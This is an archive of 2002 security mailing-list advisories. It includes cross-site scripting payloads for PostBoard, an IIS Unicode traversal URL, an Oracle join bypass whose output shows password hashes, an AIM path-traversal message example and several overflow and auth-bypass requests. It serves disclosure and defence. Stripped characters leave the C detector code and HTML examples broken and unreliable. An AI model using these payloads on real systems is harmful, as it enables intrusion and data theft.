Multiple Vulnerabilities in PostBoard

2002-04-17 Thread gcsb

Multiple Vulnerabilities in PostBoard
-

PostBoard is an add-on module for the PostNuke content
management system which implements a forum system. 
The current version of PostBoard is 2.0.1 and can be
found at:
www.nukeaddon.com or ftp.dndresources.com.

I have discovered 3 problems with it. One of which was
originally discovered in another product by someone
else. These all exist in the 2.0/2.0.1 version.

Descriptions


1) bbcode IMG tag cross-site scripting

PostBoard uses the common bbcode markup system which
uses tags similar to html. The [IMG] tag will accept 
any source including javascript. For example:

[IMG]javascript:alert('give me cookies');[/IMG]

The above javascript will execute on the victims 
machine upon viewing a message that contains it.

Solution: Only allow URLs that start with 'http://'


2) Topic title cross-site scripting

When adding a new topic to a forum the user enters a
title for their new topic. The topic title can contain
any valid HTML code including script tags. 
For example you can create a topic with the following
title and the script will execute when someone views 
the list of topics in a forum:

scriptalert('give me cookies');/script

Solution: Do not allow unsafe HTML in topic titles.
There are functions available to do this in 
the PostNuke API (i.e. pnVarPrepHTMLDisplay).


3) bbcode encoding problems

A recent advisory from Whitecell exposed 
vulnerabilities in phpBB's handling of nested 
bbcode tags which can lead to database 
corruption and high CPU usage.

PostBoard appears to use the same code as phpBB for 
encoding bbcode tags to HTML. It would be fair to 
assume that PostBoard suffers from the same 
problems as phpBB in this regard.

The original advisory by Whitecell can be found here:

http://online.securityfocus.com/archive/1/265798

A solution is provided in the above advisory.

Note: I have not tested this, but as the code in 
PostBoard appears to have been pasted from phpBB it's 
a fairly safe bet the problem exists.

Vendor Status
-

Vendor was notified of Whitecell advisory on the 7th
of April.

Vendor was notified of problems 1  2 on the 8th of
April.

A reply was received on 9th stating that fixes would 
be available in the next version. No date was given.

I sent the vendor another email on the 13th of April
to follow up on progress as there had been a bug fix
release which did not contain fixes for any of the
above problems.

On the 14th of April someone left a message on the
PostBoard support forum which sounded like someone had
been attacked with one of these problems. He included
some detail as to how it was done. I notified the
vendor that I would be posting an advisory.

On the 16th of April another person reported that
they had had their forums redirected to another
site, probably via the same method (putting a 
javascript redirect into a topic title). Still no
response from vendor.


Workarounds
---

The only pratical workaround for these problems is to
remove PostBoard from your site, or deny access to it
until a fix is released. Or try and patch it yourself.


Disclaimer
--

I do not work for, nor am I affiliated with any 
security related organisation, especially any that 
might have the same initials as my nickname/handle :)

Oh - and a big shout out to the NZ2600 crew, hi guys
(and gals)! ;)

Thanks!
gcsb.



__
Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax
http://taxes.yahoo.com/



Snort exploits

2002-04-17 Thread 0xcafebabe


I didn't see it posted to these lists, but yesterday Dug Song quietly released a tool 
on the focus-ids list which totally blindsides Snort - 
http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains 
several fragroute scripts which blindside even the current Snort version in CVS, 
tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one 
line tcp_seg 1 new don't trigger any Snort alerts at all.
:( :(

Fragroute is a very powerful new tool. Has anyone found other attacks against Snort 
with it, or tried it against any other IDS for that matter?


-=+ 0xCafeBabe +=-




Hush provide the worlds most secure, easy to use online applications - which solution 
is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/

Looking for a good deal on a domain name? 
http://www.hush.com/partners/offers.cgi?id=domainpeople




[CERT-intexxia] AOLServer DB Proxy Daemon Format String Vulnerability

2002-04-17 Thread Benoît Roussel

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


SECURITY ADVISORYINTEXXIA(c)
30 01 2002   ID #1052-300102

TITLE   : AOLServer DB Proxy Daemon Format String Vulnerability
CREDITS : Guillaume Pelat found this vulnerability / INTEXXIA



SYSTEM AFFECTED
===

AOLServer 3.4.2
AOLServer 3.4.1
AOLServer 3.4
AOLServer 3.3.1
AOLServer 3.2.1
AOLServer 3.2
AOLServer 3.1
AOLServer 3.0





DESCRIPTION
===

The Laboratory  intexxia found  a format string vulnerability in
the AOL Server external database driver proxy daemon API that could lead
to a privilege escalation.





DETAILS
===

AOL Server provides  an API  to develop external database driver
proxy daemons. Those daemons are linked to a library (libnspd.a).

The Laboratory  intexxia found  a format  string and  a buffer  overflow
vulnerability in  the 'Ns_PdLog'  function of  the  library.  Successful
exploitation of the bug could allow an  attacker to execute code and get
access on the system.

As a result, all  the External Driver Proxy Daemons using the 'Ns_PdLog'
function  with  the  'Error'   or  'Notice'  parameter  are  potentially
vulnerable.





SOLUTION


This vulnerability has been  fixed in the current version in CVS
branch  nsd_v3_r3_p0 (post-AOLserver  3.4.2) and  can  be  used  for any
affected version.  The patch  used was  created by  intexxia and  can be
found in  attachment. More  information can  be found  at the  following
URL :

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/aolserver/aolserver/nspd/log.c.diff?r1=1.4r2=1.4.6.1





VENDOR STATUS
=

14-03-2002 : This bulletin was sent to the developpement team.
19-03-2002 : The vendor confirmed the vulnerability and fixed it
 in  the  CVS  branch  nsd_v3_r3_p0  (post-AOLserver
 3.4.2).





LEGALS
==

AOL Server is a registered trademark.


Intexxia provides this  information  as a public service and as
is. Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
===

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - FranceFax : +33 1 55 69 78 80

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 7.0.3 for non-commercial use http://www.pgp.com

iQA/AwUBPLwQr02N8BNyNDXLEQK7yQCfVh/7x6yBxWKEi5iwRDaHEHuilGUAoN+u
14o6inQET/8E4GdnfqgS6Jtj
=YKem
-END PGP SIGNATURE-



SA1052-300102_aolserver-3.4.2-security-patched
Description: Binary data


SA1052-300102_aolserver-3.4.2-security-patched.sig
Description: Binary data


Re: Remote buffer overflow in Webalizer

2002-04-17 Thread Franck Coppola

Here is a patch to fix the vulnerability (tested against webalizer-2.01-06). 

 Franck 

Spybreak writes: 

 Release  : April 15 2002
 Author   : Spybreak ([EMAIL PROTECTED])
 Software : Webalizer
 Version  : 2.01-09, 2.01-06
 URL  : http://www.mrunix.net/webalizer/
 Status   : vendor contacted
 Problems : remote buffer overflow 
 
  
 
 
 --- INTRO --- 
 
 The Webalizer is a web server log file analysis program
 which produces usage statistics in HTML format for
 viewing with a browser.  The results are presented in both
 columnar and  graphical format, which facilitates
 interpretation. 
 
 Webalizer 2.01-06 is a part of the Red Hat Linux 7.2
 distribution, enabled by default and run daily by the cron
 daemon. 
 
 
 --- PROBLEM --- 
 
 The webalizer has the ability to perform reverse DNS lookups.
 This ability is disabled by default, but if enabled, an
 attacker with command over his own DNS service, has the
 ability to gain remote root acces to a machine, due to a remote
 buffer overflow in the reverse resolving code. 
 
 
 Public key:
 http://spybreak.host.sk 
 
 



patch.webalizer
Description: Binary data


An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Wang Jian

Hello,

I can't find information about the method I find. If I am wrong, I am
sorry.


PRINCIPLE

LKM backdoor plays tricks to hide itself, including its running processes, 
loadable kernel module and arbitary files. It changes the kernel behavior,
and hide things.

Because it hides things, it creates a fake view hiding things the installer
want to hide. Thus, differences between the real view and the fake view.

The differences are some of running processes, files are hidden, or say,
stealth.

METHODS

The discovery of LKM is important for the game. There are some ways to
do so, such as using LKM against LKM. There are two styles in all ways:

1. Find the differences between the two views;
2. Find the LKM directly;

LKM vs. LKM game involves the 2nd style.


THE ALTERNATIVE METHOD

Our alternative method uses the first style: to find the differences
between the fake view and the real view.

And we focus on filesystem view. A LKM backdoor is stealth, or it will
be discovered by juse scan the filesystem. So we check if there are
stealth files on filesystem.

We read the raw disk and traverse the filesystem on disk, bypass the
live filesystem, and create a real view of files on disk; then traverse
the live filesystem to get the fake view. Compare the two view, we can
find the differences. We will find the stealth files.

The actual code can do comparision when traversing the filesystem,
to save resouces.


PROOF OF CONCEPT

At the end, there is proof of concept code. The code is for linux and
ext2/ext3 filesystem. It has been tested on Mandrake and RedHat. Beware,
the code needs e2fsprogs 1.26 or above. A successful compilation on
RedHat invovles upgrades e2fsprogs-devel; on Mandrake, you need 
libext2fs2-devel.

The code is used for proof of concept. It is not perfect. For example,
I don't add the check for files which points to INODE 0, I think leave
it there can give you some fun to play with debug(e2)fs, and prove it
works :-)

Thanks go to Zhang JiaJun for help me to test this out, and so I can
make it some smart when facing adore.

Thanks go to Theodore Ts'o 's good libext2fs library (and bad docs),
with which I can write simple code.

We have developed proof of concept code for solaris/ufs and 
linux/reiserfs, but we still have some technical problems. We will
release them when we resolv them.


THE GAME WILL CONTINUE

The method utilizes raw disk interface, such as /dev/rdsk/c0t0d0s2
or /dev/hda1. LKM backdoor CAN intecept the interface, of course it
is rather complex and error prone.


CODE START HERE

/* stealth_file_checker.c
 * 
 * Copyright (C) 2002   Wang Jian, Marsec System Inc.
 *
 * http://www.marsec.net/
 *
 * Concept and Programming:
 *
 * Wang Jian  [EMAIL PROTECTED]
 *
 * Testing and Suggestion:
 *
 * Zhang JiaJun [EMAIL PROTECTED]
 *
 *
 * No Warranty. This code is for educational use only, commercial use is
 * prohibited.
 *
 * This small program demonstrates how to detect stealth files/dirs
 * of lkm on linux ext2/ext3 filesystems.
 *
 * compile: gcc -o sfc main.c -lext2fs
 *
 * NOTE: You need e2fsprogs-1.26 or above to compile
 *
 * usage: run it without args to get hints
 *
 */

#include stdlib.h
#include stdio.h
#include unistd.h
#include string.h
#include sys/types.h
#include sys/stat.h
#include dirent.h
#include ext2fs/ext2fs.h


ext2_ino_t   root, cwd;
ext2_filsys  fs;

ext2_ino_t string_to_inode(ext2_filsys fs, char *str)
{
ext2_ino_t  ino;
int ret;

ret = ext2fs_namei(fs, root, cwd, str, ino);
if (ret) {
return 0;
}
return ino;
}

int list_dir_proc(ext2_ino_t dir,
intentry,
struct ext2_dir_entry *dirent,
intoffset,
intblocksize,
char   *buf,
void   *private)
{
char   name[EXT2_NAME_LEN];
char   tmp[EXT2_NAME_LEN + 256];
char   tmppath[EXT2_NAME_LEN + 256];
intlen;
char   *path;
struct stat stat_buf;
intflag;

char   *prefix = (char *)private;

DIR* dp;
struct dirent   *dirp;

len = ((dirent-name_len  0xFF)  EXT2_NAME_LEN) ?
(dirent-name_len  0xFF) : EXT2_NAME_LEN;

strncpy(name, dirent-name, len);
name[len] = '\0';

if(entry == DIRENT_DELETED_FILE) {
return 0;
}

ext2fs_get_pathname(fs, dir, 0, path);
sprintf(tmp, %s%s/%s, prefix, path, name);
sprintf(tmppath, %s%s, prefix, path);

/* chdir() then readdir() is for adore LKM, anyway it works
 * for other LKM.
 */
chdir(tmppath);
if( (dp = opendir(.)) == NULL ) {
printf(open dir %s error\n, tmppath);
exit(1);
}
flag=1;
while ((dirp = readdir(dp)) != NULL) {
if (strcmp(dirp-d_name, name) == 0) { 
flag=0;
break;
}
}
closedir(dp);

Re: Ability to read buddy list of AIM users

2002-04-17 Thread Eugene Medynskiy

  any OS although I havent tried linux and Mac yet.

Under Linux (or any Unix), all AIM clients I've tried (AOL AIM for 
Linux, Everybuddy, GAIM) put your buddy list into your home directory, 
so unless you have world-readable home directories this should not be a 
problem.

-- 
-- Eugene Medynskiy

You can't fight in here, this is the War Room!





Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread H D Moore

--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

Summary:

Microsoft's IIS 5.0 web server is shipped with a set of
sample files to demonstrate different features of the ASP
language. One of these sample files allows a remote user to
view the source of any file in the web root with the extension
.asp, .inc, .htm, or .html. The IISSamples virtual directory
should not be left on production servers in the first place,
but until now there were no serious[1] vulnerabilities found in
those sample scripts. Microsoft was _not_ contacted about
this, they can read the lists like everyone else. This is an
issue that can be fixed by proper system administration. 

Solution:

Remove the /IISSamples virtual directory using the Internet
Services Manager. If for some reason this is not possible,
removing the following ASP script will fix the problem: 

This path assumes that you installed IIS in c:\inetpub

c:\inetpub\iissamples\sdk\asp\docs\CodeBrws.asp

Details:

The IIS developers actually put some thought into securing
this sample script. Unfortunately for them and their user
base, they didn't take into account the Unicode character
set when checking the path passed to the script.

The function fValidPath in CodeBrws.asp has the following
comment placed above it:

REM **
REM  intended behavior:
REM allow access to only .asp, .htm, .html, .inc files
REM in some directory starting from /IISSAMPLES
REM and without .. in the path
REM **  

The fValidPath function first checks to see if the base
directory starts with /IISSAMPLES, then verifies that the
last characters of the request are one of the allowed
extensions, and finally checks to see if the .. sequence is
anywhere in the string. 

The problem is that .. can be represented a number of other
ways using the Unicode character set. For instance, the
sequence %c0%ae%c0%ae will be decoded as two periods by IIS,
but will not be caught by the InStr(1,strPath,..,1) code in
the ASP script. So to create a request which passes the input
filters but retrieves the source of default.asp...


/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp


[1] While all versions of IIS previous to 5.0 had significant problems
with the bundled sample scripts, 5.0 has only had a couple information 
gathering issues to date. Due to the lowered risk, many administrators
have left the iissamples virtual directory mapped on their
production servers.



Mailman/Pipermail private mailing list/local user vulnerability

2002-04-17 Thread H. Peter Anvin

There is a vulnerability in Pipermail (mailing list archiving software 
distributed with and integrated with Mailman), that affects you if you 
have local users on the machine.

If you have (a) private Mailman mailing lists and (b) user
logins on the same machine, any local user can read the archives of
those private mailing lists.

The Mailmain people have apparently declined to fix this bug.  Therefore 
  I wanted to report it here so people are at the very least aware.

Attached is my bug report and their response.

-hpa


  Bugs item #474616, was opened at 2001-10-24 16:35
  You can respond by visiting:
  
http://sourceforge.net/tracker/?func=detailatid=100103aid=474616group_id=103
 
  Category: Pipermail
  Group: None
 
 Status: Closed
 Resolution: Wont Fix
 
  Priority: 8
  Submitted By: H. Peter Anvin (hpa)
  Assigned to: Nobody/Anonymous (nobody)
  Summary: SECURITY: Pipermail permissions problem
 
  Initial Comment:
  $mailman_root/archive/private is o+x in the default
  installation.  This allows anyone with local access to
  the machine to read the archives of private mailing
  lists, as long as they know the (trivial) structure of
  the files beneath this directory.
 
  I have verified that changing this directory to o-x
  causes *all* pipermail pages to become inaccessible, so
  that does not resolve the problem.
 
  There presumably needs to be a setgid program involved
  which can verify that the user is authenticated and
  give access to the archives if appropriate; then that
  directory can be made o-x.
 
 
 
  --
 
 
 Comment By: Barry Warsaw (bwarsaw)
 
  Date: 2002-04-11 18:40
 
  Message:
  Logged In: YES
  user_id=12800
 
  I'm not inclined to fix this, since this arrangement is
  crucial to the web security of private archives.  Since
  Mailman is usually run on mail and/or web servers that have
  very limited access anyway, I don't consider this an
  important vulnerability.
 
 
  --
 
  You can respond by visiting:
  
http://sourceforge.net/tracker/?func=detailatid=100103aid=474616group_id=103





Re: ansi outer join syntax in Oracle allows access to any data

2002-04-17 Thread Pete Finnigan

Hi Charles

The point is that I can see the dba_users view owned by SYS as a user
with only CREATE SESSION privilege. This is only possible because of the
bug in the ANSI outer join syntax. This bug allows access to any table
without any granted privileges to any user!

The example you show below doesn't show which user you are logged in as
or what privileges that user has. I assume its a user that is either a
DBA or has select privileges on the catalog or SELECT ANY TABLE or
select explicitly on that view.

Try the exact SQL i showed and check for yourself that it doesn't work
in 8.1.6. but will work in 9.0.1

cheers

Pete

In article [EMAIL PROTECTED], Charles J
Wertz [EMAIL PROTECTED] writes
You don't need 9i or ansi syntax.

Connected to:
Oracle8i Enterprise Edition Release 8.1.6.0.0 - Production
With the Partitioning option
JServer Release 8.1.6.0.0 - Production

SQL set serveroutput on size 100
SQL sta users
SQL select username, user_id, password from sys.dba_users
  2  /

..
USERNAME  USER_ID PASSWORD
-- -- --
GABRMJ21  206 A08F7F24DCD35845
ABDUSM62  204 25F6BFBE9888CB23
CLARVL18  205 E45523E8504F938E
SYMEJM94  195 BF1A81C928566EEE
COSAL75   118 4EDA8C950487B16F
CONNTS37  117 B3EB3D464F64E317
ANASD51   111 AC5DE6711420E91E
FEDEJB07  224 5111DAC3006F6D81
DELLJM28  223 FC707A68849F1C3F
CARTKR33  222 2002A82D0DB2DB19
BRANLD12  221 9857842415FF35B5
...

I haven't checked this out.
I take it these are encrypted passwords ??

cjw

At 04:24 PM 4/16/2002 +0100, Pete Finnigan wrote:
Hi all

I thought this list may be interested in this issue, apologies if its
known here already.

Oracle 9i includes the new ANSI outer join syntax. Oracle still supports
the old syntax but in the new syntax there is a serious security issue
that allows any user to view any data.

here is an example:

SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

(c) Copyright 2001 Oracle Corporation.  All rights reserved.


Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production

SQL connect / as sysdba
Connected.
SQL CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL Grant Create Session to us1;

Grant succeeded.

SQL connect us1/us11;
Connected.
SQL select a.username, a.password
   2  from sys.dba_users a left outer join sys.dba_users b on
   3  b.username = a.username
   4  ;

USERNAME   PASSWORD
-- --
SYSD4C5016086B2DC6A
SYSTEM D4DF7931AB130E37
DBSNMP E066D214D5421CCC
AURORA$JIS$UTILITY$INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD
SCOTT  F894844C34402B67
US1491AB9AB94D8A9EF
OUTLN  4A3BA55E08595C81
ORDSYS 7EFA02EC7EA6B86F
OLAPSVRAF52CFD036E8F425

USERNAME   PASSWORD
-- --
OLAPSYS3FB8EF9DB538647C
ORDPLUGINS 88A2B2C183431F00
MDSYS  72979A94BAD2AF80
CTXSYS 71E687F036AD56E5
WKSYS  69ED49EE1851900D
OLAPDBA1AF71599EDACFB00
QS_CBADM   7C632AFB71F8D305
QS_ADM 991CDDAD5C5C32CA
QS 8B09C6075BDF2DC4
QS_WS  24ACF617DD7D8F2F
HR 6399F3B38EDF3288

USERNAME   PASSWORD
-- --
OE 9C30855E7E0CB02D
PM 72E382A52E89575A
SH 9793B3777CD3BD1A
QS_ES  E6A6FA4BB042E3C2
QS_OS  FF09F3EB14AE5C26
RMAN   E7B5D92911C831E1
QS_CB  CF9CFACF5AE24964
QS_CS  91A00922D8C0F146

30 rows selected.

SQL

This shows that a user with the barest of privileges, i.e. CREATE
SESSION can actually see data in the data dictionary that should not be
seen. In this example we can select the list of usernames and their
hashes.

I wanted to bring this issue to the security community as its doing the
rounds on the oracle server newsgroup. Oracle are already aware of this
as there is a bug to 

AIM's 'Direct Connection' feature could lead to arbitrary file creation

2002-04-17 Thread Noah Johnson



AIM's 'Direct Connection' feature could lead to 
arbitrary file creation
--
-
Author: Noah Johnson ( [EMAIL PROTECTED] )

Affected versions: 
 All versions of AOL Instant Messenger (up to 
4.8 beta) on all platforms of Windows (as far as I can 
tell).

Preface:
AOL may have patched their servers to prevent 
the wave of DoS attacks recently discovered, but this 
bug - related to the 'Direct Connection' feature - 
cannot be filtered through the server itself, and 
therefore requires a new realease to be patched. 
Because direct connections (almost always) 
require user approval, the severity of this bug is 
somewhat smaller than others recently discovered, 
however exploitation is fairly simple and could result 
in anywhere from arbitrary script execution to 
overwriting of critical files, and so I think it's still 
worthy of being noted and fixed soon.

Summary:
  The problem arises in AIM's handling of 
embedded objects during direct connections with 
other users. These 'direct connections' supposedly 
make it easier for users to share multimedia with 
each other during conversations. When a direct 
connection is to be made, the initiating side acts as a 
server - on port 4443 - for the recipient's client to 
connect to (if the request is accepted, of course). 
After this connection is made, all activity between the 
two users is passed through it, relieving the AIM 
server of its job for the time being.
 When a user sends a picture or a sound to his 
buddy, an IMG tag is appropriately inserted into the 
conversation source, while that file's data lies in a 
separate DATA tag immediately proceeding the 
HTML (see below). The client responds to this IMG 
tag either by displaying the picture in the conversation 
or by displaying an icon of the MIME/file-type that has 
been sent. Along with the standard parameters of this 
IMG tag (HEIGHT, WIDTH, DATASIZE, ID, etc...), 
the client also specifies the name and path of the 
original file that was sent. This information is included 
in the SRC parameter, and is the one of importance 
here. The client uses this information in a few ways - 
including the default filename suggested when the 
user opts to save whatever the hell was sent.
So, why does anyone care?
   One last nifty feature I forgot to mention... When 
the client parses the file and recognizes it as a 
RIFF/WAVE type, it will play that file instantly via 
the 'SndPlaySoundEx' API function. Instead of playing 
the buffer directly from memory however, it is instead 
downloaded into the Windows 'temp' directory and 
read from there. But for some odd reason, THE 
ORIGINAL FILENAME IS USED FOR THIS 
TEMPORARY FILE! (Can you see where this is 
heading??)
With very trivial parsing of this SRC parameter, 
AIM is left wide open to the old (..\..) directory 
traversal attack. So now we can choose ANY path on 
our buddy's system to save our file to simply by 
appropriately sculpting the SRC information. Here's 
an example of what might be sent from the direct 
connection:

... 
Data Headers (explained later)
HTMLBODYHey, what's up?IMG 
SRC=\..\system\johnny.important_file HEIGHT=0 
WIDTH=0 DATASIZE=50 
ID=1/BODY/HTMLBINARYDATA 
ID=1***WAVE FILE DATA 
HERE***/DATA/BINARY
...

   Assuming that the temp directory on Johnny's 
computer is [c:\windows\temp], this would 
write/overwrite whatever file was thus specified. No 
obvious signs of this would be noted, as the WAVE 
icon would never show up in Johnny's box (notice the 
HEIGHT and WIDTH values).

Fooling the Client:
As noted earlier, AIM only saves this (semi-)
temporary file when it identifies it as valid RIFF/WAVE 
data and tries to play it. So what good is this if we can 
only write WAVE files? (HOLY SHIT! YOU MEAN 
WE CAN OVERWRITE THEIR AIM SOUNDS?!)
Unfortunately for Johnny, the client only looks at the 
first 12 bytes before concluding it is indeed a valid 
sound file. These bytes ideally look like this (see 
wave file specifications):

Offset  Data
0,1,2,3 ASCII 'RIFF'
4,5,6,7 DWORD Wave File Size ( - can be 
anything, we don't care;
neither does the client. )
8,9,A,B ASCII 'WAVE'

  Keeeping this as a base, we can then sculpt any 
file we want (sample exploits next). As long as these 
12 bytes are respected (actually, only the ASCII parts 
of them really matter), the file is saved. 
  The fact that the header is already determined 
severely limits the danger of this bug (we cannot, for 
example, create an executable file). There are a few 
ways around this...

Exploiting:
   Besides the potential of overwriting files, there 
are plenty of file types that can be bullshitted in the 
first 12 bytes without losing functionality of the entire 
thing (think scripts, 

[SNS Advisory No.51] Compaq Tru64 UNIX libc Buffer Overflow Vulnerability

2002-04-17 Thread [EMAIL PROTECTED]

--
SNS Advisory No.51
Compaq Tru64 UNIX libc Buffer Overflow Vulnerability

Problem first discovered: Sun, 18 Nov 2001
Published: Thu, 17 Apr 2002
--

Overview:
-
  Libc included with Compaq Tru64 UNIX contains a buffer overflow 
  vulnerability, which could allow local attackers to elevate privileges.

Problem Description:

  Libc included with Compaq Tru64 UNIX is vulnerable to a buffer overflow 
  due to a flaw in the handling of the environment variables LANG and LOCPATH. 
  Local attackers could elevate privileges by using a SUID/SGID executable 
  file that links to the vulnerable libc. 

Affected Versions:
--
  Compaq Tru64 UNIX V4.0F
  Compaq Tru64 UNIX V5.0
  Compaq Tru64 UNIX V5.1
  Compaq Tru64 UNIX V5.1A

Solution:
-
  This problem can be eliminated by applying an appropriate patch to your 
  Tru64 UNIX version based on the information in the following URL:

  Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities
  in Tru64,Unix,CDE,NFS,and NIS:
  http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml

Discovered by:
--
  Noboru Yoshinaga (LAC)  [EMAIL PROTECTED]

Disclaimer:
---
  All information in these advisories are subject to change without any 
  advanced notices neither mutual consensus, and each of them is released 
  as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences 
  caused by applying those information. 





[SNS Advisory No.50] Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability

2002-04-17 Thread [EMAIL PROTECTED]

--
SNS Advisory No.50
Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability

Problem first discovered: Wed, 10 Oct 2001
Published: Thu, 17 Apr 2002
--

Overview:
-
  dtprintinfo included with Compaq Tru64 UNIX contains a buffer overflow 
  vulnerability, which could potentially allow local attackers to elevate 
  privileges.

Problem Description:

  The /usr/dt/bin/dtprintinfo included with Compaq Tru64 UNIX is a program 
  for opening the CDE Print Manager window. This program is installed as 
  SUID root. In dtprintinfo it is possible to restore a client to the 
  original desktop state by loading the session file using the -session 
  option. A buffer overflow will occur in dtprintinfo when an unusually long 
  string of characters is used in session filenames. This will result in the 
  possibility for the local attacker to execute arbitrary code as root. 
  
Affected Versions:
--
  Compaq Tru64 UNIX V4.0F
  Compaq Tru64 UNIX V5.0
  Compaq Tru64 UNIX V5.1
  Compaq Tru64 UNIX V5.1A

Solution:
-
  This problem can be eliminated by applying an appropriate patch to your 
  Tru64 UNIX version based on the information in the following URL:

  Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities
  in Tru64,Unix,CDE,NFS,and NIS:

  http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml

Discovered by:
--
  Noboru Yoshinaga  [EMAIL PROTECTED]

Disclaimer:
---
  All information in these advisories are subject to change without any 
  advanced notices neither mutual consensus, and each of them is released 
  as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences 
  caused by applying those information. 





Re: ansi outer join syntax in Oracle allows access to any data

2002-04-17 Thread Greg Williamson

Tested as a user with some privs (but not DBA or SELECT ANY TABLE) as below

SQL select username, user_id, password from sys.dba_users;
select username, user_id, password from sys.dba_users
*
ERROR at line 1:
ORA-00942: table or view does not exist


SQL select * from v$version
  2  ;

BANNER

Oracle8i Enterprise Edition Release 8.1.6.3.0 - Production
PL/SQL Release 8.1.6.3.0 - Production
CORE8.1.6.0.0   Production
TNS for Solaris: Version 8.1.6.3.0 - Production
NLSRTL Version 3.4.0.0.0 - Production

SQL 
 

Not sure if ANSI syntax is required (not testable in 8.1.6) and I don't have
a 9i DB to test it on.

Greg.
 - Begin Forwarded Message -

 The point is that I can see the dba_users view owned by SYS as a user
 with only CREATE SESSION privilege. This is only possible because of the
 bug in the ANSI outer join syntax. This bug allows access to any table
 without any granted privileges to any user!
 
 The example you show below doesn't show which user you are logged in as
 or what privileges that user has. I assume its a user that is either a
 DBA or has select privileges on the catalog or SELECT ANY TABLE or
 select explicitly on that view.
 
 Try the exact SQL i showed and check for yourself that it doesn't work
 in 8.1.6. but will work in 9.0.1
 
 cheers
 
 Pete
 



Webtrends Reporting Center Buffer Overflow (#NISR17042002C)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:WebTrends Reporting Center 4.0d
Systems Affected:  WinNT, Win2K, XP
Severity:  High Risk
Category:   Remote System Buffer Overrun
Vendor URL:   http://www.webtrends.com
Author:   Mark Litchfield ([EMAIL PROTECTED])
Advisory URL:  http://www.ngssoftware.com/advisories/wtr.txt
Date:   17th April 2002
Advisory number: #NISR17042002C

Issue: Attackers can run arbitrary code, remotely, as SYSTEM.

Description
***
WebTrends Reporting Center provides fast and comprehensive analysis of web
site activity to multiple decision-makers  throughout an organization via a
browser-based interface.  WebTrends Reporting Center is, according to their
own website,  NetIQ's flagship web analytics reporting product, recently
receiving an Editor's Choice Award from Network Computing Magazine  (Feb 6,
2002).

Details
***
Buffer Overrun: In order for an attacker to exploit this vulnerability
requires they must first undergo user authentication at
http://targetmachine:1099(default listening port)/remote_login.pl. However,
Webtrends Reporting Server allows anonymous logins for reports that are made
available for public viewing.  After a successful login, making a GET
request to http://targetmachine:1099/reports/(Long Char String) will cause
an access violation occurs in WTRS_UI.EXE (WTX_REMOTE.DLL) overwriting the
saved return address on the stack.  The Reporting Server process,
WTRS_UI.EXE, is by default started as a system service along with WTRS.EXE,
therefore any arbitary code would execute with  system privileges.

Path Disclosure - By making a simple GET request for
http://targetmachine/get_od_toc.pl?Profile= (no authentication required) an
error message is returned - Unable to open content file
path=C:/PROGRA~1/WEBTRE~1/wtm_wtx/


Fix Information
***
NGSSoftware alerted Webtrends to the buffer overrun issue on 31st March 2002
and future versions will be fixed. There is still some question as to
whether a patch will be produced for earlier versions. In the meantime
NGSSoftware recommend preventing anonymous access to the Reports server.
NGSSoftware recommend that where possible, the service be run as a low
privileged account as opposed to starting it as a system service.

A check for these issues have been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which more information is available
from the NGSSite : http://www.ngssoftware.com/.

Further Information
***
For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf






Back Office Web Administrator Authentication Bypass (#NISR17042002A)

2002-04-17 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name:Back Office Web Administration Authentication Bypass
Systems Affected:  Microsoft's Back Office Web Administrator 4.0, 4.5
Severity:  Medium/High
Vendor URL:   http://www.microsoft.com
Author:   David Litchfield ([EMAIL PROTECTED])
Date:   17th April 2002
Advisory number: #NISR17042002A
Advisory URL:  http://www.ngssoftware.com/advisories/boa.txt

Issue: Attackers can bypass the logon page and access the Back Office Web
Administrator

Description
***
With the Microsoft Back Office suite of products comes a web based
administration ASP based application that runs on IIS. Normally, to use the
administration pages a user must authenticate but NGSSoftware have
discovered that it is trivial to bypass this.

Details
***
Each of the Back Office Web Administrator ASP pages checks to see if the
user has been authenticated but does this with the following snippet of code

 If Request.ServerVariables(auth_type) =  Then
  Response.Status = 401 ACCESS DENIED
  Response.End
 End If

This is the only authorization/authentication performed. As such it's
trivial to bypass:

 GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1
